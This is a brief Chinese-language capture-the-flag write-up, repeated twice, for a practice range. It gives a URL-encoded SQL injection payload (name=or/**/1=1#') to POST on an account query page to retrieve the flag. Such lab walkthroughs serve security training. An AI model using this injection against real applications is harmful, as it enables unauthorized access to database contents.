靶场地址:http://www.whalwl.xyz:8017
解题准备:熟悉PHP中的参数传递
解题思路:
1、在查询账户页面构造payload,POST方式提交
name=or%2F**%2F1%3D1%23%27&submit=%E6%9F%A5%E8%AF%A2
2、直接获取flag, name=or/**/1=1#'
靶场地址:http://www.whalwl.xyz:8017
解题准备:熟悉PHP中的参数传递
解题思路:
1、在查询账户页面构造payload,POST方式提交
name=or%2F**%2F1%3D1%23%27&submit=%E6%9F%A5%E8%AF%A2
2、直接获取flag, name=or/**/1=1#'